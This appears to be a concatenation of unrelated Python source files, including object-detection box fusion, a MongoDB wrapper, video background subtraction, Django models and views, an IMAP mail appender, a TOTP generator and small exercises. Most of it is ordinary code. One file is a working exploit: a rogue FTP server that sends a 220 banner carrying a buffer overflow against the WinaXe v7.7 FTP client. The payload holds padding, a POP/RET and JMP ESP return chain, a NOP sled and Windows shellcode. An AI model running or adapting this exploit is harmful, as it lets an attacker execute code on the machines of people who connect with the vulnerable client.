def postprocess_fusion(df, fusion_type, iou_thr=0.5, sigma=0.1, skip_box_thr=0.0001):
results = []
image_ids = df["image_id"].unique()
for image_id in tqdm(image_ids, total=len(image_ids), position=0, leave=True):
# All annotations for the current image.
data = df[df["image_id"] == image_id]
data = data.reset_index(drop=True)
annotations = {}
weights = []
# WBF expects the coordinates in 0-1 range.
max_value = data.iloc[:, 4:].values.max()
data.loc[:, ["x_min", "y_min", "x_max", "y_max"]] = data.iloc[:, 4:] / max_value #[4:] denotes x_min,y_min,x_max,y_max
# Loop through all of the annotations for single image
for idx, row in data.iterrows():
model_id = row["model"]
if model_id not in annotations:
annotations[model_id] = {
"boxes_list": [],
"scores_list": [],
"labels_list": [],
}
# Assume equal weightage
weights.append(1.0)
annotations[model_id]["boxes_list"].append([row["x_min"], row["y_min"], row["x_max"], row["y_max"]])
annotations[model_id]["scores_list"].append(row['confidence'])
annotations[model_id]["labels_list"].append(row["class"])
boxes_list = []
scores_list = []
labels_list = []
#Combine all predcitions from all models for a image_id
for annotator in annotations.keys():
boxes_list.append(annotations[annotator]["boxes_list"])
scores_list.append(annotations[annotator]["scores_list"])
labels_list.append(annotations[annotator]["labels_list"])
# Calculate Fusion
if fusion_type == 'wbf':
boxes, scores, labels = weighted_boxes_fusion(
boxes_list,
scores_list,
labels_list,
weights=weights,
iou_thr=iou_thr,
skip_box_thr=skip_box_thr)
if fusion_type == 'nms':
boxes, scores, labels = nms(
boxes_list,
scores_list,
labels_list,
weights=weights,
iou_thr=iou_thr)
if fusion_type == 'softnms':
boxes, scores, labels = soft_nms(
boxes_list,
scores_list,
labels_list,
sigma=sigma,
weights=weights,
iou_thr=iou_thr)
if fusion_type == 'nmw':
boxes, scores, labels = non_maximum_weighted(
boxes_list,
scores_list,
labels_list,
weights=weights,
iou_thr=iou_thr,
skip_box_thr=skip_box_thr)
#Fused results for a single image
for box, score, label in zip(boxes, scores, labels):
results.append({
"image_id": image_id,
"class": int(label),
"confidence": round(score, 2),
"x_min": int(box[0] * max_value),
"y_min": int(box[1] * max_value),
"x_max": int(box[2] * max_value),
"y_max": int(box[3] * max_value)
})
results = pd.DataFrame(results, columns=['image_id','class','confidence','x_min','y_min','x_max','y_max'])
return results
#MAIN
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='vinbigdata')
parser.add_argument('--submission-path', type=str, required=True,
help='csv directory for single model detection')
args = parser.parse_args()
#Process each model submission
ensemble_df = pd.DataFrame()
for idx, subs in enumerate (glob.glob(args.submission_path + '/*.csv')):
print('Read from {}'.format(subs.split('/')[-1]))
model_df = pd.read_csv(subs)
new_model_df = string_to_row(model_df, idx)
ensemble_df = pd.concat([ensemble_df, new_model_df], axis=0)
#Do WBF
print("Shape of ensembled data before WBF: {}".format(ensemble_df.shape))
wbf_ensemble = postprocess_fusion(ensemble_df, fusion_type='wbf')
print("Shape of ensembled data after WBF: {}".format(wbf_ensemble.shape))
#Convert back to submission format
print("Converting to submission...")
final_submission = row_to_string(wbf_ensemble)
print("Shape of submission: {}".format(final_submission.shape))
final_submission.to_csv(os.path.join(args.submission_path, 'ensemble_submission.csv'), index=False)
|
#!/usr/bin/env python
# coding=utf-8
import ConfigParser
import pymongo
class MongoConnection():
def __init__(self):
config = ConfigParser.SafeConfigParser()
config.read("settings.ini")
self.conn = pymongo.Connection(config.get("mongodb", "host"), int(config.get("mongodb", "port")))
def get_connection(self):
return self.conn
def get_database(self, dbname):
try:
return self.conn[dbname]
except:
print "open database failed!"
def get_collection(self, dbname, collection_name):
try:
return self.conn[dbname][collection_name]
except:
print "get collection failed!"
if __name__ == '__main__':
mc = MongoConnection()
conn = mc.get_connection()
|
#!/usr/bin/env python
__author__ = "Master Computer Vision. Team 02"
__license__ = "M6 Video Analysis"
# Import libraries
import os
import math
import cv2
import numpy as np
from scipy import ndimage
from evaluate import *
from sklearn.metrics import confusion_matrix
from skimage.segmentation import clear_border
from PIL import Image
from skimage.measure import label
from skimage.measure import regionprops
from util import preprocess_pred_gt
from morphology import dilation, remove_dots, erosion
from hsv_shadow_remove import hsv_shadow_remove
# Define colors spaces to transform frames
colorSpaceConversion={}
colorSpaceConversion['YCrCb'] = cv2.COLOR_BGR2YCR_CB
colorSpaceConversion['HSV'] = cv2.COLOR_BGR2HSV
colorSpaceConversion['gray'] = cv2.COLOR_BGR2GRAY
# Path to save images and videos
images_path = "std-mean-images/"
video_path = "background-subtraction-videos/"
# Define groundtruth labels namely
STATIC = 0
HARD_SHADOW = 50
OUTSIDE_REGION = 85
UNKNOW_MOTION = 170
MOTION = 255
shadow_removal = 1
def get_accumulator(path_test):
"""
Description: get accumulator structure data
Depends on image size to define borders
Data are coded into 32 bits of floats
Input: path test
Output: accumulator
"""
# Initialize accumualtor
accumulator = np.zeros((0,0), np.float32)
# Set accumulator depending on dataset choosen
if path_test == "./highway/input/":
accumulator = np.zeros((240,320,150), np.float32)
if path_test == "./fall/input/":
accumulator = np.zeros((480,720,50), np.float32)
if path_test == "./traffic/input/":
accumulator = np.zeros((240,320,50), np.float32)
return accumulator
def gaussian_color(path_test, path_gt, first_frame, last_frame, mu_matrix, sigma_matrix, alpha, colorSpace, connectivity, areaPixels,ac_morphology,SE1size,SE2size):
"""
Description: gaussian
Input: path_test, path_gt, first_frame, last_frame, mu_matrix, sigma_matrix, alpha, colorSpace, connectivity, areaPixels
Output: AccFP, AccFN, AccTP, AccTN, AccP, AccR, AccF1
"""
# Initialize metrics accumulators
AccFP = 0
AccFN = 0
AccTP = 0
AccTN = 0
AccP = []
AccR = []
AccF1 = []
# Initialize index to accumulate images
index = 0
# Define the codec and create VideoWriter object
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(video_path+"gaussian_color_"+str(path_test.split("/")[1])+"_connectivity_"+str(connectivity)+".avi", fourcc, 60, (get_accumulator(path_test).shape[1], get_accumulator(path_test).shape[0]))
out_noshadow = cv2.VideoWriter(video_path + "mask" +str(path_test.split("/")[1])+"_connectivity_"+str(connectivity)+".avi", fourcc, 60, (get_accumulator(path_test).shape[1], get_accumulator(path_test).shape[0]))
# Define structuring element according to connectivity
structuring_element = [[0,0,0],[0,0,0],[0,0,0]]
if connectivity == '4':
structuring_element = [[0,1,0],[1,1,1],[0,1,0]]
if connectivity == '8':
structuring_element = [[1,1,1],[1,1,1],[1,1,1]]
# Read sequence of images sorted
for filename in sorted(os.listdir(path_test)):
# Check that frame is into range
frame_num = int(filename[2:8])
if frame_num >= first_frame and frame_num <= last_frame:
# Read image from groundtruth
frame = cv2.imread(path_test+filename)
# Check and transform color space
if colorSpace != 'RGB':
frame = cv2.cvtColor(frame, colorSpaceConversion[colorSpace])
# Compute pixels that belongs to background
background = np.prod(abs(frame - mu_matrix) >= alpha*(sigma_matrix+2),axis=2)
background_mask = background ##ADDED AUX VARIABLE
# Convert bool to int values
background = background.astype(int)
# Replace 1 by 255
background[background == 1] = 255
# Scales, calculates absolute values, and converts the result to 8-bit
background = cv2.convertScaleAbs(background)
# Read groundtruth image
gt = cv2.imread(path_gt+"gt"+filename[2:8]+".png", 0)
# Shadow removal
if shadow_removal == 1:
shadow_mask = hsv_shadow_remove(cv2.imread(path_test + filename), mu_matrix)
# Convert Boolean to 0, 1
shadow_mask = 1*shadow_mask
not_mask = np.logical_not(shadow_mask)
background_noshadow = np.logical_and(not_mask, background_mask)
background_noshadow = background_noshadow.astype(int)
# Replace 1 by 255
background_noshadow[background_noshadow == 1] = 255
# Scales, calculates absolute values, and converts the result to 8-bit
background_noshadow = cv2.convertScaleAbs(background_noshadow)
background_frame_noshadow = cv2.cvtColor(background_noshadow, cv2.COLOR_GRAY2RGB)
shadow_mask = shadow_mask.astype(int)
shadow_mask[shadow_mask == 1] = 255
shadow_mask = cv2.convertScaleAbs(shadow_mask)
shadow_mask = cv2.cvtColor(shadow_mask, cv2.COLOR_GRAY2RGB)
out_noshadow.write(shadow_mask)
#out_noshadow.write(background_frame_noshadow)
background = background_noshadow
# Hole filling
background = ndimage.binary_fill_holes(background, structure=structuring_element).astype(int)
if ac_morphology==1:
background = dilation(background,SE1size)
background = ndimage.binary_fill_holes(background, structure=structuring_element).astype(int)
background = erosion(background,SE1size)
background = remove_dots(background,SE2size)
# Replace 1 by 255
background[background == 1] = 255
# Scales, calculates absolute values, and converts the result to 8-bit
background = cv2.convertScaleAbs(background)
# Area filltering, label background regions
label_image = label(background)
# Measure properties of labeled background regions
if areaPixels > 0:
for region in regionprops(label_image):
# Remove regions smaller than fixed area
if region.area < areaPixels:
minr, minc, maxr, maxc = region.bbox
background[minr:maxr,minc:maxc] = 0
bck, gt = preprocess_pred_gt(background, gt)
# Evaluate results
TP, FP, TN, FN = evaluate_sample(bck, gt)
# Accumulate metrics
AccTP = AccTP + TP
AccTN = AccTN + TN
AccFP = AccFP + FP
AccFN = AccFN + FN
# Write frame into video
video_frame = cv2.cvtColor(background, cv2.COLOR_GRAY2RGB)
out.write(video_frame)
# Compute metrics
print(" AccTP: {} AccFP: {} AccFN: {}".format(AccTP, AccFP, AccFN))
if AccTP+AccFP == 0:
AccP = 0
else:
AccP = AccTP / float(AccTP + AccFP)
if AccTP + AccFN == 0:
AccR = 0
else:
AccR = AccTP / float(AccTP + AccFN)
if AccR == 0 and AccP == 0:
AccF1 = 0
else:
AccF1 = 2 * AccP * AccR / (AccP + AccR)
return AccFP, AccFN, AccTP, AccTN, AccP, AccR, AccF1
|
import os
import sys
import shutil
sys.path.insert(0, os.path.join("tools", "families"))
import fam
def export_note(output_dir):
with open(os.path.join(output_dir, "README.txt"), "w") as writer:
writer.write("This directory contains the datasets used in GeneRax paper.\n")
writer.write("The cyanobacteria datasets comes from the ALE paper.\n")
writer.write("We extracted the primates dataset from ENSEMBL.\n")
writer.write("We generated the jsim datasets with jprime and seqgen.\n")
writer.write("\n")
writer.write("Each directory follows the exact same structure.\n")
writer.write("- species_tree contains the species trees.\n")
writer.write("- families contains the gene families.\n")
writer.write("- alignments contains symlink to the alignments (the real files are in the family directories).\n")
writer.write("\n")
writer.write("Each gene family directory contains:\n")
writer.write("- the MSA alignment (either fasta or phylip).\n")
writer.write("- the gene to species mapping file.\n")
writer.write("- gene_trees: a directory with all the trees we inferred for the paper, including the true tree for simulated datasets (for empirial datasets, the \"true\" trees are the trees from the database and should not be seen as the ground truth!!).\n")
writer.write(".\n")
def export_dataset(dataset, output_dir):
datadir = fam.get_datadir(dataset)
newdatadir = os.path.join(output_dir, dataset)
os.mkdir(newdatadir)
ignore = shutil.ignore_patterns("misc")
print(" copy species tree")
shutil.copytree(fam.get_species_dir(datadir), fam.get_species_dir(newdatadir))
print(" copy alignments directory")
shutil.copytree(fam.get_alignments_dir(datadir), fam.get_alignments_dir(newdatadir), symlinks = True)
print(" copy families directory")
shutil.copytree(fam.get_families_dir(datadir), fam.get_families_dir(newdatadir), ignore=ignore)
def export_all_data(output_dir):
print("Removing previous files...")
try:
shutil.rmtree(output_dir)
except:
pass
os.mkdir(output_dir)
export_note(output_dir)
datasets = []
for dataset in os.listdir(os.path.join(fam.get_datasets_family_path())):
if (dataset.startswith("jsim")):
datasets.append(dataset)
datasets.append("cyano_empirical")
datasets.append("cyano_simulated")
datasets.append("ensembl_96_ncrna_primates")
for dataset in datasets:
print("Exporting dataset " + dataset)
export_dataset(dataset, output_dir)
if (__name__ == "__main__"):
output_dir = "extracted_data"
export_all_data(output_dir)
|
#import GPIO library & time
import RPi.GPIO as GPIO
import time
#Pin numbers
led1 = 7
led2 = 11
led3 = 13
#set GPIO numbering mode and define input pin
GPIO.setmode(GPIO.BOARD)
#OUT
for ledX in [led1, led2, led3]:
GPIO.setup(ledX,GPIO.OUT) # Set led's mode is output
GPIO.output(ledX, GPIO.LOW) # Set led to low(0V) for clean start
try:
while True:
for ledX in [led1, led2, led3]:
GPIO.output(ledX, GPIO.HIGH) # Set led to high(3V)
time.sleep(0.2)
for ledX in [led1, led2, led3]:
GPIO.output(ledX, GPIO.LOW) # Set led to high(3V)
time.sleep(0.2)
except KeyboardInterrupt:
GPIO.cleanup()
|
"""
A Bag Learner wrapper. (c) 2017 Paul Livesey
"""
import numpy as np
class BagLearner(object):
def __init__(self,
learner,
kwargs,
bags = 20,
boost = False,
verbose = False):
self.learner = learner
self.kwargs = kwargs
self.bags = bags
self.boost = boost
self.verbose = verbose
self.results = np.array([])
def author(self):
return 'plivesey3' # replace tb34 with your Georgia Tech username
def addEvidence(self,dataX,dataY):
"""
@summary: Add training data to learner
@param dataX: X values of data to add
@param dataY: the Y training values
"""
#if self.verbose:
#mu.printVerbose("dataX", dataX)
#mu.printVerbose("dataY", dataY)
# For each bag, build a random group of data from
# dataX. This should use the first 60% of the
# data and should allow the same data to be used more
# than once.
# Once the bags is created, run it against the learner
# and store the result
self.results = {} #np.empty((0, 4), float)
for bag in range(self.bags):
built_bag = np.empty((0, dataX.shape[1]), float)
built_bag_res = np.empty((0), float)
for row_cnt in range(int(0.6 * dataX.shape[0]) ):
rnd_choice = np.random.randint(int(0.6 * dataX.shape[0]))
rnd_item = np.array([dataX[rnd_choice]])
rnd_res = dataY[rnd_choice]
built_bag = np.vstack((built_bag, rnd_item))
built_bag_res = np.append(built_bag_res, rnd_res)
#if self.verbose:
#mu.printVerbose("built bag", built_bag)
#mu.printVerbose("built bag result", built_bag_res)
# Now run the learner on this randomised selection
# and add the results to the end.
new_learner = self.learner(**self.kwargs)
new_learner.addEvidence(built_bag, built_bag_res)
self.results[bag] = new_learner
#if self.verbose:
#mu.printVerbose("self.results", self.results)
def query(self,points):
"""
@summary: Estimate a set of test points given the model we built.
@param points: should be a numpy array with each row corresponding to a
specific query.
@returns the estimated values according to the saved model.
"""
#if self.verbose:
#mu.printVerbose("self.results", self.results)
# Go through all of the results and find their mean. This is our
# main result
results = np.empty(points.shape[0])
cnt = 0.0
for key, dec_table in self.results.items():
results += (dec_table.query(points))
cnt = cnt + 1.0
return results / cnt
if __name__=="__main__":
print "the secret clue is 'zzyzx'"
|
import socket,struct
import sys
#WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit
#Discovery hyp3rlinx
#ISR: ApparitionSec
#hyp3rlinx.altervista.org
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
eip=struct.pack('<L',0x68084A6F) #POP ECX RET
jmpesp=struct.pack('<L',0x68017296) #JMP ESP
#We will do POP ECX RET and place a JMP ESP address at the RET address that will jump to shellcode.
payload="A"*2061+eip+jmpesp+"\x90"*10+sc+"\x90"*20 #Server Ready '220' Exploit
port = 21
s = socket.socket()
host = sys.argv[1]
s.bind((host, port))
s.listen(5)
print 'Evil FTPServer listening...'
while True:
conn, addr = s.accept()
conn.send('220'+payload+'\r\n')
conn.close()
|
import imaplib
import email
from email import message
import time
username = 'gmail_id'
password = 'gmail_password'
new_message = email.message.Message()
new_message.set_unixfrom('satheesh')
new_message['Subject'] = 'Sample Message'
# from gmail id
new_message['From'] = 'eppalapellisatheesh1@gmail.com'
# to gmail id
new_message['To'] = 'eppalapellisatheesh1@gmail.com'
# message data
new_message.set_payload('This is the body of the message.\n')
# print(new_message)
# you want to connect to a server; specify which server and port
# server = imaplib.IMAP4('server', 'port')
server = imaplib.IMAP4_SSL('imap.googlemail.com')
# after connecting, tell the server who you are to login to gmail
# server.login('user', 'password')
server.login(username, password)
# this will show you a list of available folders
# possibly your Inbox is called INBOX, but check the list of mailboxes
response, mailboxes = server.list()
if response == 'OK':
response, data = server.select("Inbox")
response = server.append('INBOX', '', imaplib.Time2Internaldate(time.time()), str(new_message).encode('utf-8'))
# print(response)
if response[0] == 'OK':
print("Gmail Appended Successfully")
else:
print("Not Appended")
server.close()
server.logout()
|
#!/usr/bin/env python
import optparse
class IridiumMobileIFace:
def __init__(self):
pass
def main(self):
op=optparse.OptionParser()
op.add_option("--fetch", help="Fetch messages from satellite network", action="store_true")
op.add_option("--mail", help="Send email from file", action="append")
op.add_option("--twitter-status", help="Update twitter status", action="append")
op.add_option("--twitter-message", help="Send twitter private message", nargs=2, action="append", metavar="USER MESSAGE")
op.add_option("--reg-send-auth", help="Register sending authorization", nargs=2, action="append", metavar="TOKEN NBYTES")
op.add_option("-s", "--serial-port", help="Set serial port", action="store")
(options, arg)=op.parse_args()
print options, arg
if __name__=="__main__":
IridiumMobileIFace().main()
|
"""
@author: vyildiz
"""
# Import the modules to be used from Library
import numpy as np
import math
from scipy import special
import matplotlib.pyplot as plt
import statistics
from func_FDC import *
def postplot(num, M, V, L, os_probability, streamflow, av_multiplier, Q_futures , Nsize, low_percentile, case_to_derive):
"""
This function plots 4 figures.
The ffirst three Figures show the sampling and calculated sattistical paramaters
to show if they match each other.
The last figure shows a random 3 years of observed stream flow vs derived streamflow
- num: the size of sampling
- M: sampled median values
- V: sampled coefficient of variation (Cv) values
- L: sampled first percentile values
- os_probability: the exceedance probability of the streamflow records
- streamflow: input data (observed discharge)
- av_multiplier: available set of multipliers
- Nsize: size of the time series (input)
- Q_futures: generated future flows
- low_percentile: the coefficient of low percentile function
- case_plot: mean or median case
"""
# Figure 1: Fit KOSUGI MODEL to historical data
# Figure 2: derived FDCs
# Derive streamflow statistics
Q_m, Q_v, Q_low = streamflow_statistics(Q_futures, low_percentile, num, case_to_derive)
# Figure 3: plot sampled vs calculated mean/median values
plt.plot(Q_m, 'ro', label="Derived")
plt.plot(M, 'b*', label="Sampled")
plt.legend(loc="upper right")
plt.grid()
plt.xlabel("Futures")
plt.ylabel("M")
plt.savefig('PostProcessor_plots' + '/Fig3-M.png')
plt.clf()
# Figure 4: plot sampled vs calculated Std/CV values
plt.plot(Q_v, 'ro', label="Derived")
plt.plot(V, 'b*', label="Sampled")
plt.legend(loc="upper right")
plt.grid()
plt.xlabel("Futures")
plt.ylabel("V")
plt.savefig('PostProcessor_plots' + '/Fig4-V.png')
plt.clf()
# Figure 5: plot sampled vs calculated low percentile values
plt.plot(Q_low, 'ro', label="Derived")
plt.plot(L, 'b*', label="Sampled")
plt.legend(loc="upper right")
plt.grid()
plt.xlabel("Futures")
plt.ylabel("Low Percentile [$m^3/s$]")
plt.savefig('PostProcessor_plots' + '/Fig5-Low.png')
plt.clf()
#Figure 6: Random 3 years of observed stream flow vs derived streamflow
plt.figure(figsize=(11, 6))
idplot = np.where((av_multiplier[:,1] > 1.75) & (av_multiplier[:,0] < 0.75) & (0.5 < av_multiplier[:,0]) ) # find the scenario to plot
idplot = np.asarray(idplot) # converting tuple into int array
if np.size(idplot) == 0:
idplot = np.where(av_multiplier[:,1] >= 1.75)
idplot = np.asarray(idplot) # converting tuple into int array
idplot = np.min(idplot) # get on of the indices if there is more than one
qplot = Q_futures[:,idplot] # select the future
qplot = np.reshape(qplot, (len(os_probability),1))
#plt.plot(streamflow[8765:-1],'r')
#plt.plot(qplot[8765:-1],c='0.35')
plt.plot(streamflow[8765:-1],'r', label="Observed Streamflow")
plt.plot(qplot[8765:-1], label="Derived Streamflow",c='0.35')
plt.legend(loc="upper right")
plt.xlabel("Time [Days]")
plt.ylabel("Discharge [$m^3/s$]")
plt.grid()
plt.xlim(0, len(qplot[8765:-1])+10)
plt.legend(bbox_to_anchor=(1.05, 1))
plt.tight_layout()
plt.savefig('PostProcessor_plots' + '/Fig6-ObservedvsDerived_discharge.png')
plt.clf()
|
def find_next_square(sq):
return (sq**0.5 + 1)**2 if (sq**0.5).is_integer() else -1
'''
Complete the findNextSquare method that finds the next integral perfect square
after the one passed as a parameter. Recall that an integral perfect square
is an integer n such that sqrt(n) is also an integer.
If the parameter is itself not a perfect square, than -1 should be returned.
You may assume the parameter is positive.
Examples:
findNextSquare(121) --> returns 144
findNextSquare(625) --> returns 676
findNextSquare(114) --> returns -1 since 114 is not a perfect
'''
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import hmac
import hashlib
import base64
import struct
import time
import sys
def g_code_3(token):
key = base64.b32decode(token)
pack = struct.pack(">Q", int(time.time()) // 30) # 将间隔时间转为big-endian(大端序)并且为长整型的字节
sha = hmac.new(key, pack, hashlib.sha1).digest() # 使用hmac sha1加密,并且以字节的方式取出 = b'\x0f\x1a\xaeL\x0c\x8e\x19g\x8dv}\xde7\xbc\x95\xeal\xa3\xc1\xee'
o = sha[19] & 15 # bin(15)=00001111=0b1111
pwd = str((struct.unpack(">I", sha[o:o + 4])[0] & 0x7fffffff) % 1000000)
code = str(0) + str(pwd) if len(pwd) < 6 else pwd
return code
if __name__ == '__main__':
print(g_code_3(token=sys.argv[1]))
|
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 20 14:12:48 2013
@author: bejar
"""
import scipy.io
import numpy as np
from scipy import corrcoef
from sklearn.cluster import spectral_clustering,affinity_propagation
import matplotlib.pyplot as plt
from pylab import *
from sklearn.metrics import silhouette_score
from sklearn.manifold import spectral_embedding
from matplotlib.colors import ListedColormap
from mpl_toolkits.mplot3d import Axes3D
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.cross_validation import cross_val_score
import pylab as pl
from scipy import corrcoef
from sklearn.decomposition import PCA,KernelPCA
def correlationMatrix(mdata,linit,lend,nstep):
lstep=(lend-linit)/nstep
corr=np.zeros((mdata.shape[0],mdata.shape[0]))
for length in range(linit,lend,lstep):
corrs=corrcoef(mdata[:,length:length+lstep])
corr+=corrs
corr/=nstep
return corr
def exampleData(name):
mats=scipy.io.loadmat( cpath+name+'.mat')
data= mats['data']
chann= mats['names']
j=0
mdata=None
lch=[]
for i in range(chann.shape[0]):
cname=chann[i][0][0]
if cname[0]=='A' and cname!='A53' and cname!='A31' and cname!='A44' and cname!='A94':
j+=1
if mdata==None:
mdata=data[i]
else:
mdata=np.vstack((mdata,data[i]))
lch.append(cname)
print sort(lch)
cmatrix=correlationMatrix(mdata,0,400000,10)
examp=np.zeros((j*(j-1)/2))
print j
p=0
for i in range(cmatrix.shape[0]-1):
for j in range(i+1,cmatrix.shape[0]):
#if np.isnan(corr[i,j]) or corr[i,j]<0.7:
examp[p]=cmatrix[i,j]
p+=1
return examp
cpath='/home/bejar/MEG/Data/'
cres='/home/bejar/Documentos/Investigacion/MEG/res/'
#name='MMN-201205251030'
name='control1-MMN'
mats=scipy.io.loadmat( cres+'patcorr.mat')
data= mats['data']
cl=mats['classes']
classes=[]
for i in range(cl.shape[0]):
classes.append(cl[i][0])
classes =np.array(classes)
lcol=cl
X=data
Y=classes
#for c in [0.001,0.01,0.1,1,10,100]:
# clf = SVC(C=c,kernel='linear')
# score=cross_val_score(clf,X,Y,cv=10)
# print c,':',np.mean(score),np.std(score)
#
#for c in [0.001,0.01,0.1,1,10,100,1000,10000]:
# clf = SVC(C=c,kernel='linear')
# clf.fit(X,Y)
# #print clf.n_support_
# print clf.predict(X)
examps=X
trans=PCA(n_components=3)
trans.fit(examps)
X=trans.transform(examps)
#X=examps
#Y=np.array(lcol)
#patdata={}
#patdata['data']=X
#patdata['classes']=Y
#scipy.io.savemat(cres+'patcorr',patdata,do_compression=True)
ax=pl.subplot(1, 1, 1, projection='3d')
pl.scatter(X[:,0],X[:,1],zs=X[:,2],c=lcol,s=25)
pl.show()
#c=1
#clf = SVC(C=c,kernel='linear',probability=True)
#clf.fit(X,Y)
#
#val=exampleData('comp10-MEG')
#
#print clf.predict(val), clf.predict_proba(val)
#
#val=exampleData('comp10-MMN')
#print clf.predict(val), clf.predict_proba(val)
|
import tensorflow as tf
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from tensorflow.keras.layers import Dense
from tensorflow.keras import Sequential
from tensorflow.keras.optimizers import Adam
from sklearn import datasets
from sklearn import preprocessing
'''
정규화
1. min, max normalization
2. stadardizaion normalization
'''
data = [[828, 920, 1234567, 1020, 1111],
[824, 910, 2345612, 1090, 1234],
[880, 900, 3456123, 1010, 1000],
[870, 990, 2312123, 1001, 1122],
[860, 980, 3223123, 1008, 1133],
[850, 970, 2432123, 1100, 1221]]
data = np.float32(data)
scale = preprocessing.MinMaxScaler()
data = scale.fit_transform(data)
x_data = data[:, :-1]
y_data = data[:, -1:]
print(x_data)
print(y_data)
w = tf.Variable(tf.random_uniform([4, 1]))
b = tf.Variable(tf.random_uniform([1]))
X = tf.placeholder(dtype=tf.float32, shape=[None, 4])
Y = tf.constant(y_data, dtype=tf.float32)
hx = tf.matmul(X, w) + b
cost = tf.reduce_mean(tf.square(hx - Y))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)
train = optimizer.minimize(cost)
sess = tf.Session()
init = tf.global_variables_initializer()
sess.run(init)
for i in range(1000):
sess.run(train, feed_dict={X: x_data})
if not i % 100:
print(i, sess.run(cost, feed_dict={X: x_data}))
print(sess.run(w))
print(sess.run(b))
# 예측값
print(sess.run(hx, feed_dict={X: x_data}))
# 실제값
print(y_data)
# 역정규화
data = [[828, 920, 1234567, 1020, 1111],
[824, 910, 2345612, 1090, 1234],
[880, 900, 3456123, 1010, 1000],
[870, 990, 2312123, 1001, 1122],
[860, 980, 3223123, 1008, 1133],
[850, 970, 2432123, 1100, 1221]]
data = np.float32(data)
y1 = data[:, -1:]
ny = preprocessing.MinMaxScaler()
y1 = ny.fit_transform(y1)
xx = scale.transform(([[828, 920, 1234567, 1020, None]]))
xx = xx[:, :-1]
print(xx)
yy = sess.run(hx, feed_dict={X: xx})
print(ny.inverse_transform(yy))
|
from django.db import models
# Create your models here.
class SiteSetting(models.Model):
title = models.CharField(max_length=50, verbose_name='عنوان سایت')
address = models.CharField(max_length=200, verbose_name='آدرس شرکت')
phone = models.CharField(max_length=50, verbose_name='شماره ی تماس')
email = models.EmailField(max_length=50, verbose_name='ایمیل')
logo_image = models.ImageField(upload_to='logo/', null=True, blank=True, verbose_name='لوگوی شرکت')
about_us = models.TextField(verbose_name='درباره ی ما')
copy_right = models.TextField(verbose_name='متن کپی رایت')
def __str__(self):
return self.title
class Meta:
verbose_name = 'تنظیمات سایت'
verbose_name_plural = 'بخش تنظیمات'
|
from django.shortcuts import render, HttpResponse, HttpResponseRedirect
from home.models import Person
from datetime import date
def home(request):
#name = request.POST['name']
#number = request.POST['number']
#print(name, number, '**********haaaaahahahaha')
return render(request, 'home.html')
def about(request):
context = {}
if request.method == 'POST':
name = request.POST['name']
phone = request.POST['phone']
birth_date = request.POST['birth_date']
email = request.POST['email']
Person(name=name, phone=phone, birth_date=birth_date, email=email).save()
else:
persons = Person.objects.all()
context['persons'] = persons
return render(request, 'about.html', context)
def delete_person(request):
try:
person_id = request.POST['id']
person = Person.objects.filter(id=person_id)
if person:
person[0].delete()
return HttpResponse(person_id)
except Exception as e:
return HttpResponse(str(e))
def filter_persons(request):
try:
from_date = request.POST['from_date']
to_date = request.POST['to_date']
if to_date == '':
to_date = date.today()
persons = Person.objects.filter(date_registered__range=[from_date, to_date])
print(persons)
context = {'persons':persons}
return render(request, 'registered_persons.html', context)
except Exception as e:
raise
|
import requests
import json
import os
import gitlab
import sys
from authorization import gl
namespace = {}
def check_exist(list_available, name):
if len(list_available) == 0:
print(f"no group or project available for {name} name")
sys.exit(1)
def get_project(name):
projects_available = gl.projects.list(owned=True, search=name)
check_exist(projects_available, name)
return projects_available[0]
def get_group(name):
group_available = gl.groups.list(search=sys.argv[sys.argv.index('-g') + 1])
check_exist(group_available, sys.argv[sys.argv.index('-g') + 1])
return group_available[0]
if "-p" in sys.argv:
namespace["project"] = get_project(sys.argv[sys.argv.index('-p') + 1])
elif "-g" in sys.argv:
namespace["group"] = get_group(sys.argv[sys.argv.index('-g') + 1])
elif os.environ.get('CLI_GITLAB_PROJECT'):
namespace['project'] = get_project(os.environ.get('CLI_GITLAB_PROJECT'))
elif os.environ.get('CLI_GITLAB_GROUP'):
namespace['group'] = get_project(os.environ.get('CLI_GITLAB_GROUP'))
if not namespace:
print("Missing project or group name (use -p PROJECT_NAME or -g GROUP_NAME or environement variables (see --help))")
sys.exit(1)
if len(namespace) > 1:
print("You provide too much objects (for example multiple projects or both group and project). Check your environment variables. Pass one project or one group")
for i in namespace.values():
print(f"{i.name} provided")
sys.exit(1)
|
# Generated by Django 3.0.5 on 2020-04-29 17:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0005_auto_20200429_1343'),
]
operations = [
migrations.RemoveField(
model_name='order',
name='tags',
),
migrations.AddField(
model_name='product',
name='tags',
field=models.ManyToManyField(to='home.Tag'),
),
]
|
# Generated by Django 3.0.3 on 2020-05-09 23:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('product', '0003_auto_20200509_2259'),
]
operations = [
migrations.RenameField(
model_name='product',
old_name='short_descriptions',
new_name='short_description',
),
]
|
def isPrime(num):
prime = True
if num % num == 0:
for i in range(2, num):
if num % i != 0:
prime = True
else:
prime = False
break
return prime
def isSquare(num):
square = True
for x in range(1, num):
if x * x == num:
square = True
break
else:
square = False
return square
for value in range(100, 1000000):
primeCheck = isPrime(value)
squareCheck = isSquare(value)
if primeCheck == True:
print "Foo", value
elif squareCheck == True:
print "Bar", value
else:
print "FooBar", value
|
# most credit goes to https://github.com/lelilia/ <3
